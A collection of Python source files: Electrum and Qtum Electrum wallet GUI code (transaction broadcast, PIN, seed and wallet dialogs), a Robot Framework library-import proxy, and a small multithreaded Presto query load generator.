self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
except TxBroadcastError as e:
msg = e.get_message_for_gui()
except BestEffortRequestFailed as e:
msg = repr(e)
else:
status, msg = True, tx.txid()
Clock.schedule_once(lambda dt: on_complete(status, msg))
def broadcast(self, tx):
def on_complete(ok, msg):
if ok:
self.show_info(_('Payment sent.'))
if self.send_screen:
self.send_screen.do_clear()
else:
msg = msg or ''
self.show_error(msg)
if self.network and self.network.is_connected():
self.show_info(_('Sending'))
threading.Thread(target=self._broadcast_thread, args=(tx, on_complete)).start()
else:
self.show_info(_('Cannot broadcast transaction') + ':\n' + _('Not connected'))
def description_dialog(self, screen):
from .uix.dialogs.label_dialog import LabelDialog
text = screen.message
def callback(text):
screen.message = text
d = LabelDialog(_('Enter description'), text, callback)
d.open()
def amount_dialog(self, screen, show_max):
from .uix.dialogs.amount_dialog import AmountDialog
amount = screen.amount
if amount:
amount, u = str(amount).split()
assert u == self.base_unit
def cb(amount):
screen.amount = amount
popup = AmountDialog(show_max, amount, cb)
popup.open()
def addresses_dialog(self):
from .uix.dialogs.addresses import AddressesDialog
if self._addresses_dialog is None:
self._addresses_dialog = AddressesDialog(self)
self._addresses_dialog.update()
self._addresses_dialog.open()
def fee_dialog(self, label, dt):
from .uix.dialogs.fee_dialog import FeeDialog
def cb():
self.fee_status = self.electrum_config.get_fee_status()
fee_dialog = FeeDialog(self, self.electrum_config, cb)
fee_dialog.open()
def on_fee(self, event, *arg):
self.fee_status = self.electrum_config.get_fee_status()
def protected(self, msg, f, args):
if self.electrum_config.get('pin_code'):
on_success = lambda pw: f(*(args + (self.password,)))
self.password_dialog(
message = msg,
check_password=self.check_pin_code,
on_success=on_success,
on_failure=lambda: None,
is_password=False)
else:
f(*(args + (self.password,)))
def toggle_lightning(self):
if self.wallet.has_lightning():
if not bool(self.wallet.lnworker.channels):
warning = _('This will delete your lightning private keys')
d = Question(_('Disable Lightning?') + '\n\n' + warning, self._disable_lightning)
d.open()
else:
self.show_info('This wallet has channels')
else:
            warning1 = _("Lightning support in Electrum is experimental. Do not put large amounts in lightning channels.")
            warning2 = _("Funds stored in lightning channels are not recoverable from your seed. You must back up your wallet file every time you create a new channel.")
d = Question(_('Enable Lightning?') + '\n\n' + warning1 + '\n\n' + warning2, self._enable_lightning)
d.open()
def _enable_lightning(self, b):
if not b:
return
wallet_path = self.get_wallet_path()
self.wallet.init_lightning()
self.show_info(_('Lightning keys have been initialized.'))
self.stop_wallet()
self.load_wallet_by_name(wallet_path)
def _disable_lightning(self, b):
if not b:
return
wallet_path = self.get_wallet_path()
self.wallet.remove_lightning()
self.show_info(_('Lightning keys have been removed.'))
self.stop_wallet()
self.load_wallet_by_name(wallet_path)
def delete_wallet(self):
basename = os.path.basename(self.wallet.storage.path)
d = Question(_('Delete wallet?') + '\n' + basename, self._delete_wallet)
d.open()
def _delete_wallet(self, b):
if b:
basename = self.wallet.basename()
self.protected(_("Enter your PIN code to confirm deletion of {}").format(basename), self.__delete_wallet, ())
def __delete_wallet(self, pw):
wallet_path = self.get_wallet_path()
basename = os.path.basename(wallet_path)
if self.wallet.has_password():
try:
self.wallet.check_password(pw)
except:
self.show_error("Invalid PIN")
return
self.stop_wallet()
os.unlink(wallet_path)
self.show_error(_("Wallet removed: {}").format(basename))
new_path = self.electrum_config.get_wallet_path(use_gui_last_wallet=True)
self.load_wallet_by_name(new_path)
def show_seed(self, label):
self.protected(_("Enter PIN code to display your seed"), self._show_seed, (label,))
def _show_seed(self, label, password):
if self.wallet.has_password() and password is None:
return
keystore = self.wallet.keystore
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
label.data = seed
if passphrase:
label.data += '\n\n' + _('Passphrase') + ': ' + passphrase
def has_pin_code(self):
return bool(self.electrum_config.get('pin_code'))
def check_pin_code(self, pin):
if pin != self.electrum_config.get('pin_code'):
raise InvalidPassword
def password_dialog(self, **kwargs):
if self._password_dialog is None:
self._password_dialog = PasswordDialog()
self._password_dialog.init(self, **kwargs)
self._password_dialog.open()
def change_password(self, cb):
def on_success(old_password, new_password):
self.wallet.update_password(old_password, new_password)
self.password = new_password
self.show_info(_("Your password was updated"))
on_failure = lambda: self.show_error(_("Password not updated"))
self.password_dialog(
check_password = self.wallet.check_password,
on_success=on_success, on_failure=on_failure,
is_change=True, is_password=True,
has_password=self.wallet.has_password())
def change_pin_code(self, cb):
if self._password_dialog is None:
self._password_dialog = PasswordDialog()
def on_success(old_password, new_password):
self.electrum_config.set_key('pin_code', new_password)
cb()
self.show_info(_("PIN updated") if new_password else _('PIN disabled'))
on_failure = lambda: self.show_error(_("PIN not updated"))
self._password_dialog.init(
self, check_password=self.check_pin_code,
on_success=on_success, on_failure=on_failure,
is_change=True, is_password=False,
has_password = self.has_pin_code())
self._password_dialog.open()
def save_backup(self):
if platform != 'android':
self._save_backup()
return
from android.permissions import request_permissions, Permission
def cb(permissions, grant_results: Sequence[bool]):
if not grant_results or not grant_results[0]:
self.show_error(_("Cannot save backup without STORAGE permission"))
return
# note: Clock.schedule_once is a hack so that we get called on a non-daemon thread
# (needed for WalletDB.write)
Clock.schedule_once(lambda dt: self._save_backup())
request_permissions([Permission.WRITE_EXTERNAL_STORAGE], cb)
def _save_backup(self):
new_path = self.wallet.save_backup()
if new_path:
self.show_info(_("Backup saved:") + f"\n{new_path}")
else:
self.show_error(_("Backup NOT saved. Backup directory not configured."))
def export_private_keys(self, pk_label, addr):
if self.wallet.is_watching_only():
self.show_info(_('This is a watching-only wallet. It does not contain private keys.'))
return
def show_private_key(addr, pk_label, password):
if self.wallet.has_password() and password is None:
return
if not self.wallet.can_export():
return
try:
key = str(self.wallet.export_private_key(addr, password))
pk_label.data = key
except InvalidPassword:
self.show_error("Invalid PIN")
return
self.protected(_("Enter your PIN code in order to decrypt your private key"), show_private_key, (addr, pk_label))
|
SuiteVisitorImportProxy.py
|
#
# Copyright 2017 Nokia Solutions and Networks
# Licensed under the Apache License, Version 2.0,
# see license.txt file for details.
#
import threading
import sys
import json
import types
import inspect
import re
from robot.api import SuiteVisitor
from robot.running import TestLibrary
from robot.running.testlibraries import _BaseTestLibrary
from robot.running.handlers import _DynamicHandler, _JavaHandler
from robot.output import LOGGER, Message
class SuiteVisitorImportProxy(SuiteVisitor):
LIB_IMPORT_TIMEOUT = 60
def __init__(self, robot_version, handle_keywords=False, support_gevent=False):
import robot.running.namespace
robot.running.namespace.IMPORTER = RedImporter(robot.running.namespace.IMPORTER, self.LIB_IMPORT_TIMEOUT,
robot_version, handle_keywords, support_gevent)
def visit_suite(self, suite):
suite.tests.clear()
suite.keywords.clear()
suite.suites.visit(self)
def visit_test(self, test):
# test visiting skipped
pass
def visit_keyword(self, kw):
# keyword visiting skipped
pass
def visit_message(self, msg):
# message visiting skipped
pass
class RedImporter(object):
def __init__(self, importer, lib_import_timeout, robot_version, handle_keywords=False, support_gevent=False):
self.importer = importer
self.lib_import_timeout = lib_import_timeout
self.robot_version = robot_version
self.handle_keywords = handle_keywords
self.support_gevent = support_gevent
self.func = None
self.lock = threading.Lock()
self.cached_lib_items = list()
self.cached_kw_items = set()
def __getattr__(self, name):
self.lock.acquire()
try:
if hasattr(self.importer, name):
func = getattr(self.importer, name)
return lambda *args, **kwargs: self._wrap(func, args, kwargs)
raise AttributeError(name)
finally:
self.lock.release()
def _wrap(self, func, args, kwargs):
if isinstance(func, types.MethodType):
if func.__name__ == 'import_library':
return self._handle_lib_import(func, args, kwargs)
else:
return func(*args, **kwargs)
else:
return func(self.importer, *args, **kwargs)
def _handle_lib_import(self, func, args, kwargs):
libs = []
errors = []
lib_cached = self._get_lib_from_cache(args[0], args[1])
if lib_cached:
libs.append(lib_cached.lib)
errors = lib_cached.errors
else:
try:
                # Required so that code using gevent does not block this thread;
                # when gevent support is disabled, sleep below is a no-op.
if self.support_gevent:
from gevent import monkey, sleep
monkey.patch_all()
else:
sleep = lambda : None
def to_call():
try:
libs.append(func(*args, **kwargs))
sleep()
except:
errors.append(sys.exc_info())
t = threading.Thread(target=to_call)
                t.daemon = True
t.start()
t.join(timeout=self.lib_import_timeout)
except:
errors.append(sys.exc_info())
if len(libs) > 0:
library = libs[0]
else:
try:
library = self._create_test_library(args[0], args[1], args[2])
except:
try:
library = self._create_base_test_library(args[0], args[1], args[2])
except:
try:
library = self._create_base_test_library(args[0], [], args[3])
except:
errors.append(sys.exc_info())
for e in errors:
msg = json.dumps({'import_error': {'name': args[0], 'error': str(e)}})
LOGGER.message(Message(message=msg, level='NONE'))
try:
if lib_cached is None:
self.cached_lib_items.append(LibItem(args[0], args[1], library, errors))
if self.handle_keywords:
self._handle_keywords(library)
return library
except:
return None
def _get_lib_from_cache(self, name, args):
for cached_lib in self.cached_lib_items:
if cached_lib.name == name:
if len(cached_lib.args) == len(args):
for cached_arg, arg in zip(cached_lib.args, args):
if cached_arg != arg:
return None
return cached_lib
return None
def _create_test_library(self, name, args, variables):
return TestLibrary(name=name, args=args, variables=variables, create_handlers=False)
def _create_base_test_library(self, name, args, variables):
if self.robot_version < (3, 2):
return _BaseTestLibrary(libcode=None, name=name, args=args, source=None, variables=variables)
else:
return _BaseTestLibrary(libcode=None, name=name, args=args, source=None, logger=None, variables=variables)
def _handle_keywords(self, library):
if library is not None and hasattr(library, 'handlers'):
for keyword in library.handlers:
if keyword not in self.cached_kw_items and not isinstance(keyword, _JavaHandler):
try:
keyword_source = PythonKeywordSource(keyword)
msg = json.dumps({'keyword_source': dict(keyword_source.__dict__)})
LOGGER.message(Message(message=msg, level='NONE'))
except:
pass # TODO: add logging
finally:
self.cached_kw_items.add(keyword)
class LibItem(object):
    def __init__(self, name, args, lib=None, errors=None):
        self.name = name
        self.args = args
        self.lib = lib
        self.errors = errors if errors is not None else []
class PythonKeywordSource(object):
def __init__(self, keyword):
self.name = keyword.name
self.libraryName = keyword.library.name
self.filePath, self.line, self.offset, self.length = PythonKeywordSource._find_source(keyword)
@staticmethod
def _find_source(keyword):
function = PythonKeywordSource._find_function(keyword)
path = inspect.getfile(function)
source = inspect.getsourcelines(function)
for lineIdx, line in enumerate(source[0]):
            m = re.search(r'(?<=def)(\s*)([^ \t\n\r\f\v(]+)', line)
if m is not None:
line = source[1] + lineIdx - 1
offset = m.start(2)
length = len(m.group(2))
return path, line, offset, length
return path, 0, 0, 0
@staticmethod
def _find_function(keyword):
if isinstance(keyword, _DynamicHandler):
function = keyword.library._libcode.__dict__[keyword._run_keyword_method_name]
elif keyword._method:
function = keyword._method
else:
function = keyword._get_handler(keyword.library.get_instance(), keyword._handler_name)
return PythonKeywordSource._try_to_find_decorated_function(function)
@staticmethod
def _try_to_find_decorated_function(function):
try:
if hasattr(function, '__wrapped__'):
# decorated functions support, https://pypi.org/project/decorator
wrapped = getattr(function, '__wrapped__')
return PythonKeywordSource._try_to_find_decorated_function(wrapped)
elif hasattr(function, '__functions'):
# overloaded functions support, see https://github.com/bintoro/overloading.py
overloaded = getattr(function, '__functions')[0][0]
return PythonKeywordSource._try_to_find_decorated_function(overloaded)
else:
return function
except:
return function
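# Hedged illustration, not used by the proxy: _try_to_find_decorated_function
# follows the __wrapped__ attribute that functools.wraps attaches to decorated
# callables, so a keyword wrapped as sketched below still resolves to its
# original function for source lookup. All names here are placeholders.
def _decorated_keyword_sketch():
    import functools
    def log_calls(func):
        @functools.wraps(func)
        def wrapper(*args, **kwargs):
            return func(*args, **kwargs)
        return wrapper
    @log_calls
    def my_keyword():
        pass
    # functools.wraps stores the undecorated function on __wrapped__,
    # which is the attribute the lookup above walks.
    return getattr(my_keyword, '__wrapped__', my_keyword)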
|
loadgen.py
|
#!python
import prestodb
import time
import threading
# Change this array to include the queries you want to rotate through
queries = [ "select max(nationkey) from s3.s.nation",
"select min(partkey) from s3.s.part",
"select min(custkey) from s3.s.customer",
"select max(orderkey) from s3.s.orders"]
threadpoolsize = 200
newconnectionpause = 0.1
newquerypause = 0.0
reportingpause = 1.0
class Counter:
    def __init__(self):
        self.count = 0
        self.lock = threading.Lock()
    def inc(self):
        with self.lock:
            self.count += 1
    def dec(self):
        with self.lock:
            self.count -= 1
    def getCount(self):
        with self.lock:
            return self.count
nq = Counter()
def runme():
    # Each worker opens its own connection and loops forever, cycling through
    # the configured queries and keeping the in-flight counter up to date.
    conn = prestodb.dbapi.connect(
        http_scheme='https',
        auth=prestodb.auth.BasicAuthentication("starburst_service", "test"),
        host='starburst.az.starburstdata.net',
        port=8443,
        catalog='s3',
        schema='s')
    cur = conn.cursor()
    q = 0
    while True:
        nq.inc()
        try:
            cur.execute(queries[q % len(queries)])
            cur.fetchall()
            q += 1
        finally:
            nq.dec()
        time.sleep(newquerypause)
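# Main loop: grow the thread pool until it reaches threadpoolsize, and periodically
# report the pool size together with the number of in-flight queries.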
threads = []
last = time.time()
while True:
    if len(threads) < threadpoolsize:
        t = threading.Thread(target=runme)
        t.start()
        threads.append(t)
    if (now := time.time()) - last > reportingpause:
        last = now
        print("Threads: {a}; Active queries: {q}".format(a=len(threads), q=nq.getCount()))
    time.sleep(newconnectionpause)
|
main_window.py
|
#!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import threading
import os
import traceback
import shutil
import weakref
import csv
from decimal import Decimal
import base64
import binascii
import eth_abi
from PyQt5.QtCore import *
from PyQt5.QtGui import *
from PyQt5.QtWidgets import *
from qtum_electrum import keystore
from qtum_electrum.qtum import COIN, is_address, TYPE_ADDRESS, TYPE_SCRIPT, TESTNET, is_hash160, eth_abi_encode
from qtum_electrum.plugins import run_hook
from qtum_electrum.i18n import _
from qtum_electrum.util import (bh2u, bfh, format_time, format_satoshis, PrintError, format_satoshis_plain,
NotEnoughFunds, UserCancelled, profiler, export_meta, import_meta, open_browser,
InvalidPassword)
from qtum_electrum import Transaction
from qtum_electrum import util, bitcoin, commands, coinchooser
from qtum_electrum import paymentrequest
from qtum_electrum.transaction import opcodes, contract_script
from qtum_electrum.wallet import Multisig_Wallet, AddTransactionException
from qtum_electrum.tokens import Token
try:
from qtum_electrum.plot import plot_history
except:
plot_history = None
from .amountedit import AmountEdit, BTCAmountEdit, MyLineEdit
from .qrcodewidget import QRCodeWidget, QRDialog
from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit
from .transaction_dialog import show_transaction
from .fee_slider import FeeSlider
from .util import *
from .token_dialog import TokenAddDialog, TokenInfoDialog, TokenSendDialog
from .smart_contract_dialog import ContractCreateDialog, ContractFuncDialog, ContractEditDialog
class StatusBarButton(QPushButton):
def __init__(self, icon, tooltip, func):
QPushButton.__init__(self, icon, '')
self.setToolTip(tooltip)
self.setFlat(True)
self.setMaximumWidth(25)
self.clicked.connect(self.onPress)
self.func = func
self.setIconSize(QSize(25,25))
def onPress(self, checked=False):
'''Drops the unwanted PyQt5 "checked" argument'''
self.func()
def keyPressEvent(self, e):
if e.key() == Qt.Key_Return:
self.func()
class ElectrumWindow(QMainWindow, MessageBoxMixin, PrintError):
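    # Qt signals used to hand results from network and background threads back to
    # the GUI thread.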
payment_request_ok_signal = pyqtSignal()
payment_request_error_signal = pyqtSignal()
notify_transactions_signal = pyqtSignal()
new_fx_quotes_signal = pyqtSignal()
new_fx_history_signal = pyqtSignal()
new_fx_token_signal = pyqtSignal()
network_signal = pyqtSignal(str, object)
alias_received_signal = pyqtSignal()
computing_privkeys_signal = pyqtSignal()
show_privkeys_signal = pyqtSignal()
def __init__(self, gui_object, wallet):
QMainWindow.__init__(self)
self.gui_object = gui_object
self.config = config = gui_object.config
self.network = gui_object.daemon.network
self.fx = gui_object.daemon.fx
self.invoices = wallet.invoices
self.contacts = wallet.contacts
self.smart_contracts = wallet.smart_contracts
self.tokens = wallet.tokens
self.tray = gui_object.tray
self.app = gui_object.app
self.cleaned_up = False
self.is_max = False
self.payment_request = None
self.checking_accounts = False
self.qr_window = None
self.not_enough_funds = False
self.pluginsdialog = None
self.require_fee_update = False
self.tx_notifications = []
self.tl_windows = []
self.tx_external_keypairs = {}
self.create_status_bar()
self.need_update = threading.Event()
self.decimal_point = config.get('decimal_point', 8)
self.num_zeros = int(config.get('num_zeros', 0))
self.completions = QStringListModel()
self.tabs = tabs = QTabWidget(self)
self.send_tab = self.create_send_tab()
self.receive_tab = self.create_receive_tab()
self.addresses_tab = self.create_addresses_tab()
self.utxo_tab = self.create_utxo_tab()
self.console_tab = self.create_console_tab()
self.contacts_tab = self.create_contacts_tab()
self.tokens_tab = self.create_tokens_tab()
self.smart_contract_tab = self.create_smart_contract_tab()
tabs.addTab(self.create_history_tab(), QIcon(":icons/tab_history.png"), _('History'))
tabs.addTab(self.send_tab, QIcon(":icons/tab_send.png"), _('Send'))
tabs.addTab(self.receive_tab, QIcon(":icons/tab_receive.png"), _('Receive'))
tabs.addTab(self.tokens_tab, QIcon(":icons/tab_contacts.png"), _('Tokens'))
# tabs.addTab(self.contacts_tab, QIcon(":icons/tab_contacts.png"), _('Contacts'))
def add_optional_tab(tabs, tab, icon, description, name):
tab.tab_icon = icon
tab.tab_description = description
tab.tab_pos = len(tabs)
tab.tab_name = name
if self.config.get('show_{}_tab'.format(name), False):
tabs.addTab(tab, icon, description.replace("&", ""))
add_optional_tab(tabs, self.addresses_tab, QIcon(":icons/tab_addresses.png"), _("&Addresses"), "addresses")
add_optional_tab(tabs, self.utxo_tab, QIcon(":icons/tab_coins.png"), _("Co&ins"), "utxo")
add_optional_tab(tabs, self.console_tab, QIcon(":icons/tab_console.png"), _("Con&sole"), "console")
add_optional_tab(tabs, self.contacts_tab, QIcon(":icons/tab_contracts.png"), _("Con&tacts"), "contacts")
add_optional_tab(tabs, self.smart_contract_tab, QIcon(":icons/tab_console.png"), _('Smart Contract'),
'contract')
tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
self.setCentralWidget(tabs)
if self.config.get("is_maximized"):
self.showMaximized()
self.setWindowIcon(QIcon(":icons/electrum.png"))
self.init_menubar()
wrtabs = weakref.proxy(tabs)
QShortcut(QKeySequence("Ctrl+W"), self, self.close)
QShortcut(QKeySequence("Ctrl+Q"), self, self.close)
QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet)
QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count()))
QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count()))
for i in range(wrtabs.count()):
QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i))
self.payment_request_ok_signal.connect(self.payment_request_ok)
self.payment_request_error_signal.connect(self.payment_request_error)
self.notify_transactions_signal.connect(self.notify_transactions)
self.history_list.setFocus(True)
# network callbacks
if self.network:
self.network_signal.connect(self.on_network_qt)
interests = ['updated', 'new_transaction', 'status',
'banner', 'verified', 'fee']
# To avoid leaking references to "self" that prevent the
# window from being GC-ed when closed, callbacks should be
# methods of this class only, and specifically not be
# partials, lambdas or methods of subobjects. Hence...
self.network.register_callback(self.on_network, interests)
# set initial message
self.console.showMessage(self.network.banner)
self.network.register_callback(self.on_quotes, ['on_quotes'])
self.network.register_callback(self.on_history, ['on_history'])
self.network.register_callback(self.on_token, ['on_token'])
self.new_fx_quotes_signal.connect(self.on_fx_quotes)
self.new_fx_history_signal.connect(self.on_fx_history)
self.new_fx_token_signal.connect(self.on_fx_token)
# update fee slider in case we missed the callback
self.fee_slider.update()
self.load_wallet(wallet)
self.connect_slots(gui_object.timer)
self.fetch_alias()
def on_history(self, b):
self.new_fx_history_signal.emit()
def on_fx_history(self):
self.history_list.refresh_headers()
self.history_list.update()
self.address_list.update()
def on_quotes(self, b):
self.new_fx_quotes_signal.emit()
def on_fx_quotes(self):
self.update_status()
# Refresh edits with the new rate
edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e
edit.textEdited.emit(edit.text())
edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e
edit.textEdited.emit(edit.text())
# History tab needs updating if it used spot
if self.fx.history_used_spot:
self.history_list.update()
def on_token(self, b):
self.new_fx_token_signal.emit()
def on_fx_token(self):
self.token_balance_list.update()
self.token_hist_list.update()
def toggle_tab(self, tab):
show = not self.config.get('show_{}_tab'.format(tab.tab_name), False)
self.config.set_key('show_{}_tab'.format(tab.tab_name), show)
item_text = (_("Hide") if show else _("Show")) + " " + tab.tab_description
tab.menu_action.setText(item_text)
if show:
# Find out where to place the tab
index = len(self.tabs)
for i in range(len(self.tabs)):
try:
if tab.tab_pos < self.tabs.widget(i).tab_pos:
index = i
break
except AttributeError:
pass
self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", ""))
else:
i = self.tabs.indexOf(tab)
self.tabs.removeTab(i)
def push_top_level_window(self, window):
'''Used for e.g. tx dialog box to ensure new dialogs are appropriately
parented. This used to be done by explicitly providing the parent
window, but that isn't something hardware wallet prompts know.'''
self.tl_windows.append(window)
def pop_top_level_window(self, window):
self.tl_windows.remove(window)
def top_level_window(self, test_func=None):
'''Do the right thing in the presence of tx dialog windows'''
override = self.tl_windows[-1] if self.tl_windows else None
if override and test_func and not test_func(override):
override = None # only override if ok for test_func
return self.top_level_window_recurse(override, test_func)
def diagnostic_name(self):
return "%s/%s" % (PrintError.diagnostic_name(self),
self.wallet.basename() if self.wallet else "None")
def is_hidden(self):
return self.isMinimized() or self.isHidden()
def show_or_hide(self):
if self.is_hidden():
self.bring_to_top()
else:
self.hide()
def bring_to_top(self):
self.show()
self.raise_()
def on_error(self, exc_info):
if not isinstance(exc_info[1], UserCancelled):
traceback.print_exception(*exc_info)
self.show_error(str(exc_info[1]))
def on_network(self, event, *args):
if event == 'updated':
self.need_update.set()
self.gui_object.network_updated_signal_obj.network_updated_signal \
.emit(event, args)
elif event == 'new_transaction':
self.tx_notifications.append(args[0])
self.notify_transactions_signal.emit()
elif event in ['status', 'banner', 'verified', 'fee']:
# Handle in GUI thread
self.network_signal.emit(event, args)
else:
self.print_error("unexpected network message:", event, args)
def on_network_qt(self, event, args=None):
# Handle a network message in the GUI thread
if event == 'status':
self.update_status()
elif event == 'banner':
self.console.showMessage(args[0])
elif event == 'verified':
self.history_list.update_item(*args)
elif event == 'fee':
if self.config.is_dynfee():
self.fee_slider.update()
self.do_update_fee()
else:
self.print_error("unexpected network_qt signal:", event, args)
def fetch_alias(self):
self.alias_info = None
alias = self.config.get('alias')
if alias:
alias = str(alias)
def f():
self.alias_info = self.contacts.resolve_openalias(alias)
self.alias_received_signal.emit()
t = threading.Thread(target=f)
            t.daemon = True
t.start()
def close_wallet(self):
if self.wallet:
self.print_error('close_wallet', self.wallet.storage.path)
run_hook('close_wallet', self.wallet)
@profiler
def load_wallet(self, wallet):
wallet.thread = TaskThread(self, self.on_error)
self.wallet = wallet
self.update_recently_visited(wallet.storage.path)
# address used to create a dummy transaction and estimate transaction fee
self.history_list.update()
self.address_list.update()
self.utxo_list.update()
self.need_update.set()
# Once GUI has been initialized check if we want to announce something since the callback has been called before the GUI was initialized
self.notify_transactions()
# update menus
self.seed_menu.setEnabled(self.wallet.has_seed())
self.update_lock_icon()
self.update_buttons_on_seed()
self.update_console()
self.clear_receive_tab()
self.request_list.update()
self.tabs.show()
self.init_geometry()
if self.config.get('hide_gui') and self.gui_object.tray.isVisible():
self.hide()
else:
self.show()
self.watching_only_changed()
run_hook('load_wallet', wallet, self)
def init_geometry(self):
winpos = self.wallet.storage.get("winpos-qt")
try:
screen = self.app.desktop().screenGeometry()
assert screen.contains(QRect(*winpos))
self.setGeometry(*winpos)
except:
self.print_error("using default geometry")
self.setGeometry(100, 100, 860, 460)
def watching_only_changed(self):
title = 'Electrum for Qtum <Beta> %s - %s' % (self.wallet.electrum_version,
self.wallet.basename())
extra = [self.wallet.storage.get('wallet_type', '?')]
if self.wallet.is_watching_only():
# self.warn_if_watching_only()
extra.append(_('watching only'))
title += ' [%s]'% ', '.join(extra)
if TESTNET:
title += ' - testnet'
self.setWindowTitle(title)
self.password_menu.setEnabled(self.wallet.may_have_password())
self.import_privkey_menu.setVisible(self.wallet.can_import_privkey())
self.import_address_menu.setVisible(self.wallet.can_import_address())
self.export_menu.setEnabled(self.wallet.can_export())
def warn_if_watching_only(self):
if self.wallet.is_watching_only():
msg = ' '.join([
_("This wallet is watching-only."),
_("This means you will not be able to spend qtums with it."),
_("Make sure you own the seed phrase or the private keys, before you request Qtums to be sent to this wallet.")
])
self.show_warning(msg, title=_('Information'))
def open_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if not filename:
return
self.gui_object.new_window(filename)
def backup_wallet(self):
path = self.wallet.storage.path
wallet_folder = os.path.dirname(path)
filename, __ = QFileDialog.getSaveFileName(self, _('Enter a filename for the copy of your wallet'), wallet_folder)
if not filename:
return
new_path = os.path.join(wallet_folder, filename)
if new_path != path:
try:
shutil.copy2(path, new_path)
self.show_message(_("A copy of your wallet file was created in")+" '%s'" % str(new_path), title=_("Wallet backup created"))
except (BaseException,) as reason:
self.show_critical(_("Electrum was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup"))
def update_recently_visited(self, filename):
recent = self.config.get('recently_open', [])
try:
sorted(recent)
except:
recent = []
if filename in recent:
recent.remove(filename)
recent.insert(0, filename)
recent = recent[:5]
self.config.set_key('recently_open', recent)
self.recently_visited_menu.clear()
for i, k in enumerate(sorted(recent)):
b = os.path.basename(k)
def loader(k):
return lambda: self.gui_object.new_window(k)
self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1)))
self.recently_visited_menu.setEnabled(len(recent))
def get_wallet_folder(self):
return os.path.dirname(os.path.abspath(self.config.get_wallet_path()))
def new_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
i = 1
while True:
filename = "wallet_%d" % i
if filename in os.listdir(wallet_folder):
i += 1
else:
break
full_path = os.path.join(wallet_folder, filename)
self.gui_object.start_new_window(full_path, None)
def init_menubar(self):
menubar = QMenuBar()
file_menu = menubar.addMenu(_("&File"))
self.recently_visited_menu = file_menu.addMenu(_("&Recently open"))
file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open)
file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New)
file_menu.addAction(_("&Save Copy"), self.backup_wallet).setShortcut(QKeySequence.SaveAs)
file_menu.addSeparator()
file_menu.addAction(_("&Quit"), self.close)
wallet_menu = menubar.addMenu(_("&Wallet"))
wallet_menu.addAction(_("&Information"), self.show_master_public_keys)
wallet_menu.addSeparator()
self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog)
self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog)
self.private_keys_menu = wallet_menu.addMenu(_("&Private keys"))
self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog)
self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey)
self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog)
self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses)
wallet_menu.addSeparator()
address_menu = wallet_menu.addMenu(_("&Addresses"))
address_menu.addAction(_("&Filter"), lambda: self.address_list.show_toolbar(True))
labels_menu = wallet_menu.addMenu(_("&Labels"))
labels_menu.addAction(_("&Import"), self.do_import_labels)
labels_menu.addAction(_("&Export"), self.do_export_labels)
hist_menu = wallet_menu.addMenu(_("&History"))
hist_menu.addAction(_("&Filter"), lambda: self.history_list.show_toolbar(True))
hist_menu.addAction("Plot", self.plot_history_dialog).setEnabled(plot_history is not None)
hist_menu.addAction("Export", self.export_history_dialog)
contacts_menu = wallet_menu.addMenu(_("Contacts"))
contacts_menu.addAction(_("&New"), self.new_contact_dialog)
contacts_menu.addAction(_("Import"), lambda: self.contact_list.import_contacts())
contacts_menu.addAction(_("Export"), lambda: self.contact_list.export_contacts())
invoices_menu = wallet_menu.addMenu(_("Invoices"))
invoices_menu.addAction(_("Import"), lambda: self.invoice_list.import_invoices())
invoices_menu.addAction(_("Export"), lambda: self.invoice_list.export_invoices())
token_menu = wallet_menu.addMenu(_("Token"))
token_menu.addAction(_("Add Token"), lambda: self.token_add_dialog())
wallet_menu.addSeparator()
wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F"))
def add_toggle_action(view_menu, tab):
is_shown = self.config.get('show_{}_tab'.format(tab.tab_name), False)
